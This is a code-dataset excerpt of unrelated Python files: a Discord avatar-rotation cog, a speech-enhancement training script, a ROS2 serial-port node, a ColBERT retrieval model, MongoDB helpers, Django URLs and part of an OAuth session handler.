\"\"\r\n return not_animated\r\n\r\n def to_default(user):\r\n url = user.avatar_url_as(size=4096)\r\n return url\r\n\r\n try:\r\n tempvalue = target.replace(\" \", \"\")\r\n if target == \"\":\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{ctx.author.name}#{ctx.author.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(ctx.author)}) | [PNG]({to_png(ctx.author)}) | [WebP]({to_webp(ctx.author)}){to_gif(ctx.author)}')) \r\n\r\n embed.set_image(url=to_default(ctx.author))\r\n await ctx.send(embed=embed)\r\n\r\n elif tempvalue.isdigit() == False: # if not using ID, search from get_user\r\n target_member = await commands.MemberConverter().convert(ctx, target) # convert it into user either based on mention, name, or name#discrim\r\n\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{target_member.name}#{target_member.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(target_member)}) | [PNG]({to_png(target_member)}) | [WebP]({to_webp(target_member)}){to_gif(target_member)}')) \r\n\r\n embed.set_image(url=to_default(target_member))\r\n await ctx.send(embed=embed)\r\n\r\n elif tempvalue.isdigit() == True: # if using ID, use fetch_user\r\n target = target.split(\" \")\r\n for each in target:\r\n target_user = await self.bot.fetch_user(each)\r\n\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{target_user.name}#{target_user.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(target_user)}) | [PNG]({to_png(target_user)}) | [WebP]({to_webp(target_user)}){to_gif(target_user)}')) \r\n\r\n embed.set_image(url=to_default(target_user))\r\n await ctx.send(embed=embed)\r\n except Exception as e:\r\n await ctx.send(e)\r\n\r\n @cmd(aliases=['next'])\r\n async def skip(self, ctx: commands.Context):\r\n \"\"\"\r\n Change your avatar, this command will either cycle or picks random avatar depending on your config\r\n \"\"\"\r\n await self.rotator()\r\n await ctx.message.add_reaction('☑️')\r\n\r\n @cmd(aliases=['skipto', 'jumpto'])\r\n async def jump(self, ctx, index: int):\r\n \"\"\"\r\n Change avatar to specified index on list\r\n \"\"\"\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n with open('config/pfp.json', 'r') as f:\r\n pfp = json.load(f)\r\n\r\n try:\r\n avatar = pfp['links'][index - 1]\r\n except IndexError:\r\n return await ctx.send(\"index out of range\")\r\n\r\n try:\r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(avatar) as r:\r\n av = await r.read()\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n await ctx.send('☑️')\r\n except Exception as e:\r\n # this will raise if url is not an image or when you're hitting the ratelimit\r\n await ctx.send(e)\r\n \r\n @jump.error\r\n async def jump_error(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n if isinstance(error, commands.BadArgument):\r\n await ctx.send(\"index should be an integer\")\r\n\r\n @cmd(aliases=['avatars', 'links', 'link'])\r\n async def list(self, ctx: commands.Context, page_number: int = 1):\r\n \"\"\"\r\n Show list of all links inside pfp.json\r\n \"\"\"\r\n counter = 1\r\n\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n\r\n links = pfp[\"links\"]\r\n\r\n p = commands.Paginator(prefix='', suffix='')\r\n\r\n for link in links:\r\n p.add_line(line=f\"{str(counter)}. {link}\")\r\n counter += 1\r\n\r\n pages = p.pages\r\n total_pages = len(pages)\r\n\r\n if page_number <= 0:\r\n page_number = 1\r\n offset = 0\r\n elif page_number > total_pages:\r\n page_number = total_pages\r\n offset = -1\r\n else:\r\n offset = page_number - 1\r\n\r\n embed = discord.Embed(color=ctx.author.color, title='List of links', description=pages[offset])\r\n embed.set_footer(text=f\"Page {page_number}/{total_pages}\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @cmd(aliases=['rem', 'r'])\r\n async def remove(self, ctx: commands.Context, *, index: str):\r\n \"\"\"\r\n Remove a specific url inside json by using their index number shown at list/avatars command\r\n Accepts latest/l as an argument, this will delete most recent link\r\n Accepts bulk delete, separate numbers by space\r\n \"\"\"\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n links = pfp['links']\r\n\r\n counter = 0\r\n msg = \"\"\r\n\r\n index = index.split(\" \")\r\n index.sort(reverse=True) # reversed because after you delete an element, the list index will also updates. You'll get the idea\r\n for num in index:\r\n try:\r\n if num.lower() == 'l' or num.lower() == 'latest':\r\n num = -1\r\n else:\r\n num = int(num) -1\r\n result = links.pop(num)\r\n msg += result + \"\\n\"\r\n counter += 1\r\n except Exception:\r\n pass\r\n\r\n pfp['links'] = links\r\n with open(\"config/pfp.json\", 'w') as f:\r\n json.dump(pfp, f, indent=4)\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.green(),\r\n title=f\"Successfully removed {counter} link{'s' if counter != 1 else ''}\",\r\n description=msg\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @remove.error\r\n async def remove_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(f\"You need to specify index number, you can view index number of each link by using `{ctx.prefix}list`\")\r\n\r\n @cmd(aliases=['add'])\r\n async def append(self, ctx, *, links: str):\r\n \"\"\"\r\n Appends an anther avatar into json, please use direct image url only\r\n Supports bulk links, separate them by space\r\n \"\"\"\r\n success = 0\r\n fails = 0\r\n fails_result = \"\"\r\n \r\n links = links.split(\" \")\r\n for link in links:\r\n # to ensure the ones you append is a link\r\n # regex stolen from geeksforgeeks.org lol\r\n regex_match = re.search(r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\", link)\r\n if regex_match == None:\r\n link += \"\\n\"\r\n fails_result += link\r\n fails += 1\r\n else:\r\n with open(\"config/pfp.json\", 'r') as f:\r\n j = json.load(f)\r\n\r\n j_links: list = j['links']\r\n j_links.append(link)\r\n\r\n j['links'] = j_links\r\n\r\n with open(\"config/pfp.json\", 'w') as f:\r\n json.dump(j, f, indent=4)\r\n \r\n success += 1\r\n\r\n # will pick either green or red depending if there any success\r\n def green_or_red():\r\n if success == 0:\r\n color = discord.Color.red()\r\n return color\r\n else:\r\n color = discord.Color.green()\r\n return color\r\n\r\n embed = discord.Embed(color=green_or_red(), description=f\"{success} link{'s' if success != 1 and success != 0 else ''} has been appended\\n{fails} is not a link\")\r\n embed.add_field(name=f\"Invalid link{'s' if fails != 1 and fails != 0 else ''}\", value=fails_result) if fails != 0 else None\r\n\r\n await ctx.send(embed=embed)\r\n \r\n @append.error\r\n async def append_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n\r\n @tasks.loop()\r\n async def pfp_rotator(self):\r\n def get_interval_setting():\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n \r\n interval = config['interval']\r\n\r\n return interval\r\n\r\n await self.rotator()\r\n\r\n seconds = get_interval_setting()\r\n await asyncio.sleep(seconds)\r\n\r\n # the main rotator/cycle system\r\n async def rotator(self):\r\n # It need to wait for some time to connect it, without this bot.user will always return None\r\n if self.bot.variables_first_run == True:\r\n await asyncio.sleep(15)\r\n self.bot.variables_first_run = False\r\n\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n def get_cycle_setting():\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n \r\n setting = config['cycling style']\r\n\r\n return setting\r\n \r\n # cycle links inside pfp.json, it uses variable that will keep increasing by 1 until an index error raised\r\n def get_cycle_avatar(links):\r\n index = self.bot.variables_index\r\n while True:\r\n try:\r\n av = links[index]\r\n index += 1\r\n break\r\n except IndexError:\r\n index = 0\r\n\r\n # to ensure dupe avatar will not be used\r\n while self.bot.variables_last_link == av:\r\n try:\r\n index += 1\r\n av = links[index]\r\n except IndexError:\r\n index = 0\r\n\r\n self.bot.variables_index = index\r\n\r\n return av\r\n \r\n def get_random_avatar(links):\r\n av = random.choice(links)\r\n\r\n # to ensure dupe avatar will not be used\r\n while self.bot.variables_last_link == av:\r\n av = random.choice(links)\r\n\r\n return av\r\n\r\n try:\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n\r\n links = pfp[\"links\"]\r\n\r\n cycle = get_cycle_setting()\r\n\r\n if cycle == \"cycle\":\r\n avatar = get_cycle_avatar(links)\r\n\r\n else:\r\n avatar = get_random_avatar(links)\r\n\r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(avatar) as r:\r\n av = await r.read()\r\n # password is required for user accounts for whatever reason, unnecessary for bot accounts\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n except Exception as e:\r\n # this will usually raised when url is invalid, config/pfp json get messed up, or when you're hitting the ratelimit\r\n print(e)\r\n\r\ndef setup(bot):\r\n bot.add_cog(avatar_rotator(bot))","repo_name":"sinkingecstasies/discord-avatar-cycle","sub_path":"cogs/pfp.py","file_name":"pfp.py","file_ext":"py","file_size_in_byte":18972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26884523061","text":"from __future__ import absolute_import\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nnp.random.seed(42) # for reproducibility\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom stft_dataset import STFTDataset\r\nfrom residual import ResidualModel\r\nfrom highway import HighwayModel\r\nfrom masking import MaskingModel\r\nfrom baseline import BaselineModel\r\nfrom pytorch_utils import TrainLoop, load_checkpoint\r\n\r\ndef load_data(window_size, step_size, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=step_size, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('ieee_reverb_only_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=step_size, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('ieee_reverb_only_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_noisy_data(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('ieee_noisy_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('ieee_noisy_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_noisy_timit(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('timit_noisy_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('timit_noisy_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_reverb_timit(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('timit_reverb_only_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('timit_reverb_only_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\n\r\ndef train_fn(model, optimizer, criterion, batch):\r\n x, y, lengths = batch\r\n\r\n x = Variable(x.cuda())\r\n y = Variable(y.cuda(), requires_grad=False)\r\n\r\n mask = Variable(torch.ByteTensor(x.size()).fill_(1).cuda(),\r\n requires_grad=False)\r\n for k, l in enumerate(lengths):\r\n mask[:l, k, :] = 0\r\n\r\n y_hat = model(x)\r\n\r\n # Apply mask\r\n y_hat.masked_fill_(mask, 0.0)\r\n y.masked_fill_(mask, 0.0)\r\n\r\n loss = criterion(y_hat, y)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n return loss.data.item()\r\n\r\n\r\ndef valid_fn(model, criterion, batch):\r\n x, y, lengths = batch\r\n\r\n x = Variable(x.cuda(), volatile=True)\r\n y = Variable(y.cuda(), requires_grad=False)\r\n\r\n mask = Variable(torch.ByteTensor(x.size()).fill_(1).cuda(),\r\n requires_grad=False)\r\n for k, l in enumerate(lengths):\r\n mask[:l, k, :] = 0\r\n\r\n y_hat = model(x)\r\n\r\n # Apply mask\r\n y_hat.masked_fill_(mask, 0.0)\r\n y.masked_fill_(mask, 0.0)\r\n\r\n val_loss = criterion(y_hat, y).data.item()\r\n return val_loss\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n from argparse import ArgumentParser\r\n import os\r\n from glob import glob\r\n\r\n parser = ArgumentParser()\r\n\r\n parser.add_argument('--batch_size', type=int, default=32)\r\n parser.add_argument('--max_epochs', type=int, default=100)\r\n parser.add_argument('--num_hidden', type=int, default=256)\r\n parser.add_argument('--num_blocks', type=int, default=3)\r\n parser.add_argument('--num_layers_per_block', type=int, default=1)\r\n parser.add_argument('--learning_rate', type=float, default=1e-4)\r\n parser.add_argument('--model_type', default='residual')\r\n parser.add_argument('--window_size', type=int, default=32)\r\n parser.add_argument('--step_size', type=int, default=16)\r\n parser.add_argument('--data_type', default='reverb')\r\n parser.add_argument('--use_log', action='store_true')\r\n parser.add_argument('checkpoint_path')\r\n\r\n args = parser.parse_args()\r\n\r\n try:\r\n train_loop = load_checkpoint(args.checkpoint_path)\r\n except ValueError:\r\n print('No checkpoints, initializing a model from scratch...')\r\n window_size = args.window_size # in ms\r\n step_size = args.step_size\r\n n_input = int(1e-3*window_size*16000/2 + 1)\r\n n_output = n_input\r\n\r\n if args.model_type == 'residual':\r\n model = ResidualModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'highway':\r\n model = HighwayModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'masking':\r\n model = MaskingModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'baseline':\r\n model = BaselineModel(n_input,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n else:\r\n raise ValueError('model_type has to be either \"residual\", \"highway\", or \"baseline\"')\r\n\r\n print(model)\r\n\r\n criterion = torch.nn.MSELoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n\r\n if args.data_type == 'reverb':\r\n print('Loading reverb dataset')\r\n G_train, G_val = load_data(window_size, step_size, args.use_log)\r\n elif args.data_type == 'noisy':\r\n print('Loading noisy dataset')\r\n G_train, G_val = load_noisy_data(window_size, step_size, args.use_log)\r\n elif args.data_type == 'noisy_timit':\r\n print('Loading noisy_timit dataset')\r\n G_train, G_val = load_noisy_timit(window_size, step_size, args.use_log)\r\n elif args.data_type == 'reverb_timit':\r\n G_train, G_val = load_reverb_timit(window_size, step_size, args.use_log)\r\n else:\r\n raise ValueError('data_type has to be either \"reverb\" or \"noisy\"')\r\n\r\n train_loader = DataLoader(G_train, batch_size=args.batch_size,\r\n collate_fn=G_train.collate_samples,\r\n num_workers=8, shuffle=True)\r\n valid_loader = DataLoader(G_val, batch_size=args.batch_size,\r\n collate_fn=G_train.collate_samples,\r\n num_workers=4)\r\n\r\n train_loop = TrainLoop(model,\r\n optimizer, criterion,\r\n train_fn, train_loader,\r\n valid_fn, valid_loader,\r\n checkpoint_path=args.checkpoint_path)\r\n\r\n train_loop.train(args.max_epochs)\r\n\r\n","repo_name":"jfsantos/irasl2018","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"10115162652","text":"import rclpy\nimport serial\nfrom rclpy.node import Node\nfrom std_msgs.msg import Float64MultiArray\n\nclass SerialPortSubscriber(Node):\n def __init__(self):\n super().__init__(\"serial_port_subscriber\")\n\n self.declare_parameter(\"port\", \"/dev/ttyACM0\")\n self.declare_parameter(\"baudrate\", \"9600\")\n\n self.port = self.get_parameter(\"port\").value\n self.baudrate = self.get_parameter(\"baudrate\").value\n self.topicName = \"serialPort\"\n\n self.get_logger().info(f'Port: {self.port}, Baudrate: {self.baudrate}, Topic: {self.topicName}')\n\n self.subscriber = self.create_subscription(\n Float64MultiArray,\n self.topicName,\n self.subsrciber_callback,\n 10\n )\n\n self.ser = serial.Serial(self.port, self.baudrate)\n self.serial_port_send()\n\n def subsrciber_callback(self, msg):\n self.get_logger().info(f'{msg}')\n self.ser.write(msg)\n\n def serial_port_send(self):\n try:\n while True:\n count = self.ser.inWaiting();\n if count > 0:\n data = self.ser.readline()\n self.get_logger().info(f'From {self.port}: {data}')\n\n except KeyboardInterrupt:\n if self.ser != None:\n self.ser.close()\n \ndef main(args=None):\n rclpy.init(args=args)\n\n subscriber = SerialPortSubscriber()\n rclpy.spin(subscriber)\n subscriber.destroy_node()\n rclpy.shutdown()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mertemre-qtr/LEAP-upper-limb","sub_path":"ros2_ws/src/test/serial_port/serial_port/basic_serial_port.py","file_name":"basic_serial_port.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12487855634","text":"#!/usr/bin/env python\n\n\n# Now that we know the predictions, we'll compute error using the area under the ROC curve. \n# This will tell us how \"good\" the model is -- closer to 1 means that the model is better.\n# Computing error is very important to knowing when your model is \"good\", and when it is \n# getting better or worse.\nactual = [int(r[1]) for r in test]\n\nfrom sklearn import metrics\n\n# Generate the roc curve using scikits-learn.\nfpr, tpr, thresholds = metrics.roc_curve(actual, predictions, pos_label=1)\n\n# Measure the area under the curve. The closer to 1, the \"better\" the predictions.\nprint(\"AUC of the predictions: {0}\".format(metrics.auc(fpr, tpr)))\n","repo_name":"dpezzin/dpezzin.github.io","sub_path":"test/Python/dataquest/probability_naive_bayes/calc_error.py","file_name":"calc_error.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16945661700","text":"import string\nimport torch\nimport torch.nn as nn\n\nfrom transformers import BertPreTrainedModel, BertModel, BertTokenizerFast\nfrom colbert.parameters import DEVICE\n\n\nclass ColBERT(BertPreTrainedModel):\n def __init__(self, config, query_maxlen, doc_maxlen, mask_punctuation, dim=128, similarity_metric='cosine'):\n\n super(ColBERT, self).__init__(config)\n\n self.query_maxlen = query_maxlen\n self.doc_maxlen = doc_maxlen\n self.similarity_metric = similarity_metric\n self.dim = dim\n\n self.mask_punctuation = mask_punctuation\n self.skiplist = {}\n\n if self.mask_punctuation:\n self.tokenizer = BertTokenizerFast.from_pretrained('bert-base-uncased')\n self.skiplist = {w: True\n for symbol in string.punctuation\n for w in [symbol, self.tokenizer.encode(symbol, add_special_tokens=False)[0]]}\n\n self.bert = BertModel(config)\n self.linear = nn.Linear(config.hidden_size, dim, bias=False)\n\n self.init_weights()\n\n def forward(self, Q, D):\n return self.score(self.query(*Q), self.doc(*D))\n\n def query(self, input_ids, attention_mask):\n input_ids, attention_mask = input_ids.to(DEVICE), attention_mask.to(DEVICE)\n Q = self.bert(input_ids, attention_mask=attention_mask)[0]\n Q = self.linear(Q)\n\n return torch.nn.functional.normalize(Q, p=2, dim=2)\n\n def doc(self, input_ids, attention_mask, keep_dims=True):\n input_ids, attention_mask = input_ids.to(DEVICE), attention_mask.to(DEVICE)\n D = self.bert(input_ids, attention_mask=attention_mask)[0]\n D = self.linear(D)\n\n mask = torch.tensor(self.mask(input_ids), device=DEVICE).unsqueeze(2).float()\n D = D * mask\n\n D = torch.nn.functional.normalize(D, p=2, dim=2)\n\n if not keep_dims:\n D, mask = D.cpu().to(dtype=torch.float16), mask.cpu().bool().squeeze(-1)\n D = [d[mask[idx]] for idx, d in enumerate(D)]\n\n return D\n\n def score(self, Q, D):\n if self.similarity_metric == 'cosine':\n return (Q @ D.permute(0, 2, 1)).max(2).values.sum(1)\n\n assert self.similarity_metric == 'l2'\n return (-1.0 * ((Q.unsqueeze(2) - D.unsqueeze(1))**2).sum(-1)).max(-1).values.sum(-1)\n\n def mask(self, input_ids):\n mask = [[(x not in self.skiplist) and (x != 0) for x in d] for d in input_ids.cpu().tolist()]\n return mask\n","repo_name":"THUDM/P-tuning-v2","sub_path":"PT-Retrieval/colbert/colbert/modeling/colbert.py","file_name":"colbert.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","stars":1727,"dataset":"github-code","pt":"53"} +{"seq_id":"15352320962","text":"import asyncio\n\nfrom errors.db_errors import DidntFindOneError\n\n\ndef loop(func):\n def wrapper(*args, **kwargs):\n print('start')\n my_loop = asyncio.get_event_loop()\n my_loop.run_until_complete(func(*args, **kwargs))\n print('end')\n return wrapper\n\n\n@loop\nasync def do_insert_one(collection, data):\n result = await collection.insert_one(data)\n print('result inserted %s' % repr(result.inserted_id))\n return 'result inserted %s' % repr(result.inserted_id)\n\n\n@loop\nasync def do_find_one(collection, data):\n try:\n result = await collection.find_one(data)\n except DidntFindOneError:\n ex = DidntFindOneError(f'Не удалось найти элемент в базе {collection} - {data}')\n print(ex)\n result = None\n print('result founded %s' % result)\n return result\n\n\n@loop\nasync def do_update_one(collection, data):\n result = await collection.update_one(data[0], data[1])\n print('result updated %s' % result)\n\n\n@loop\nasync def do_update_many(collection, data):\n result = await collection.update_many(data[0], data[1])\n print('result updated many %s' % result)\n\n\n@loop\nasync def do_delete_one(collection, data):\n result = await collection.delete_one(data)\n print('result deleted %s' % result)\n\n\n@loop\nasync def do_delete_many(collection, data):\n result = await collection.delete_many(data)\n print('result deleted many %s' % result)\n","repo_name":"VasiliySilver/Wumpus","sub_path":"db/moto_methods.py","file_name":"moto_methods.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35664271556","text":"from django.conf.urls.defaults import *\n\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nimport newssrv.views\n\n\nurlpatterns = patterns('',\n # Example:\n (r'^feed/', include('newssrv.feeds.urls')),\n\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # (r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/', include(admin.site.urls)),\n\n #(r'^accounts/', include('registration.backends.default.urls')),\n (r'^login$', newssrv.views.login_user),\n (r'^logout$', newssrv.views.logout_user),\n (r'^$', newssrv.views.main),\n)\n\n# import settings\n# if settings.DEBUG:\n \n# urlpatterns += patterns('',\n# url(r'^static/(?P.*)$', 'django.views.static.serve',\n# {\n# 'document_root': settings.STATIC_ROOT,\n# }),\n# )\n \n","repo_name":"gmh04/test","sub_path":"news/newssrv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9735635869","text":"import cgi\nimport pickle\n\nimport webapp2\nfrom oauth2client import xsrfutil\nfrom oauth2client.appengine import InvalidXsrfTokenError\nfrom oauth2client.appengine import xsrf_secret_key\nfrom oauth2client.client import Credentials\nfrom oauth2client.client import flow_from_clientsecrets\nfrom oauth2client.clientsecrets import InvalidClientSecretsError\nfrom webapp2_extras import sessions\nfrom webapp2_extras import sessions_memcache\nfrom webapp2ext import swagger\n\nfrom education.core import config\nfrom education.core import models\nfrom education.core.googleapi import service_acount_credentials\nfrom education.exceptions import InvalidCredentialsDomainError\nfrom education.exceptions import InvalidCredentialsError\n\n\nclass SessionMissingError(Exception):\n \"\"\"The Session is not setup.\"\"\"\n\n\n_sep = '::'\n\n\ndef sign_return_url(return_url, session_id):\n token = xsrfutil.generate_token(\n xsrf_secret_key(), session_id, action_id=str(return_url)\n )\n return _sep.join((token, return_url,))\n\n\ndef validate_return_url(state, session_id):\n token, return_url = state.split(_sep, 1)\n\n if not xsrfutil.validate_token(\n xsrf_secret_key(),\n token,\n session_id,\n action_id=str(return_url)\n ):\n raise InvalidXsrfTokenError()\n\n return return_url\n\n\ndef _safe_html(s):\n return cgi.escape(s, quote=1).replace(\"'\", ''')\n\n\nclass SessionMixin(object):\n\n CREDENTIALS_KEY = 'credentials'\n USER_ID_KEY = 'user_id'\n USER_DOMAIN = 'user_domain'\n APP_NAME = 'dashboard'\n\n def set_session_store(self):\n self.session_store = sessions.get_store(request=self.request)\n\n def save_session_store(self):\n self.session_store.save_sessions(self.response)\n\n def dispatch(self):\n # Get a session store for this request.\n self.set_session_store()\n webapp2.RequestHandler.dispatch(self)\n self.save_session_store()\n\n @webapp2.cached_property\n def cookie_session(self):\n return self.session_store.get_session(\n name='session_%s' % self.APP_NAME\n )\n\n @webapp2.cached_property\n def memcache_session(self):\n return self.session_store.get_session(\n name='mc_session_%s' % self.APP_NAME,\n factory=sessions_memcache.MemcacheSessionFactory\n )\n\n def session_id(self):\n self.memcache_session\n container = self.session_store.sessions.get(\n 'mc_session_%s' % self.APP_NAME\n )\n\n if container is None:\n raise SessionMissingError()\n\n return container.sid\n\n def save_credentials(self, credentials):\n self.reset_credentials()\n self.memcache_session[self.CREDENTIALS_KEY] = credentials.to_json()\n\n def get_user_credentials(self):\n j_credentials = self.memcache_session.get(self.CREDENTIALS_KEY)\n if j_credentials is None:\n return\n\n credentials = Credentials.new_from_json(j_credentials)\n if not credentials.invalid:\n return credentials\n\n def has_credentials(self):\n return self.get_user_credentials() is not None\n\n def reset_credentials(self):\n self.memcache_session[SessionMixin.CREDENTIALS_KEY] = None\n self.cookie_session[SessionMixin.USER_ID_KEY] = None\n self.cookie_session[SessionMixin.USER_DOMAIN] = None\n\n def current_user_id(self):\n user_id = self.cookie_session.get(self.USER_ID_KEY)\n if user_id:\n return user_id\n\n credentials = self.get_user_credentials()\n if credentials is None:\n return\n\n user_id = credentials.id_token.get('sub')\n if user_id is None:\n return\n\n self.cookie_session[self.USER_ID_KEY] = user_id\n return user_id\n\n def current_user_domain(self):\n domain = self.cookie_session.get(self.USER_DOMAIN)\n if domain:\n return domain\n\n credentials = self.get_user_credentials()\n if credentials is None:\n return\n\n domain = credentials.id_token.get('hd')\n if domain is None:\n return\n\n self.cookie_session[self.USER_DOMAIN] = domain\n return domain\n\n @webapp2.cached_property\n def flow(self):\n p_flow = self.memcache_session.get('flow')\n if p_flow is not None:\n return pickle.loads(p_flow)\n\n redirect_uri = self.request.relative_url(config.OAUTH_CALLBACK_URL)\n flow = flow_from_clientsecrets(\n config.OAUTH_SECRET_PATH_PATTERN % self.APP_NAME,\n scope=config.OAUTH_SCOPES,\n redirect_uri=redirect_uri\n )\n flow.params['access_type'] = 'online'\n self.memcache_session['flow'] = pickle.dumps(flow)\n return flow\n\n def save_flow(self):\n self.memcache_session['flow'] = pickle.dumps(self.flow)\n\n\nclass ApiRequestHandler(swagger.ApiRequestHandler, SessionMixin):\n \"\"\"Extends the base request handler to handle authentication\n\n \"\"\"\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get_current_user(self):\n user_id = self.get_current_user_id()\n if user_id:\n return models.User.get_by_id(user_id)\n\n def get_current_user_id(self):\n user_id = self.current_user_id()\n domain = self.current_user_domain()\n valid_domains = config.VALID_DOMAINS.keys()\n if user_id and domain in valid_domains:\n return user_id\n\n def admin_required(self, msg=None, admin_msg=None):\n user = self.login_required(msg=msg)\n if user.is_admin or user.is_domain_admin:\n return user\n\n self.abort(403, admin_msg)\n\n def get_current_user_data(self):\n return self.get_current_user()\n\n def student_required(self):\n \"\"\"Abort the request if the user is not a student\n\n \"\"\"\n return self.login_required()\n\n def staff_required(self):\n \"\"\"Abort the request if the user is not a staff mumber or\n an admin.\n\n \"\"\"\n user = self.login_required()\n if not user.is_staff:\n self.admin_required()\n\n return user\n\n\nclass LoginHandler(webapp2.RequestHandler, SessionMixin):\n \"\"\"Handle authentication of student and users.\n\n \"\"\"\n def dispatch(self):\n return SessionMixin.dispatch(self)\n\n def get(self):\n \"\"\"Populate user's session with her oauth credential and her\n user id.\n\n If the user is new it will register her/him. Otherwise it will update\n her/his data.\n\n \"\"\"\n state = self.request.GET.get('state', None)\n if state:\n try:\n redirect_uri = validate_return_url(\n str(state), self.session_id()\n )\n except InvalidXsrfTokenError:\n redirect_uri = config.DEFAULT_RETURN_URL\n else:\n redirect_uri = config.DEFAULT_RETURN_URL\n\n self.memcache_session.setdefault(SessionMixin.CREDENTIALS_KEY, None)\n self.cookie_session.setdefault(SessionMixin.USER_ID_KEY, None)\n self.cookie_session.setdefault(SessionMixin.USER_DOMAIN, None)\n\n try:\n models.User.update_or_create(\n self.current_user_id(),\n self.current_user_domain(),\n service_acount_credentials(self.APP_NAME),\n self.get_user_credentials()\n )\n except InvalidCredentialsDomainError:\n 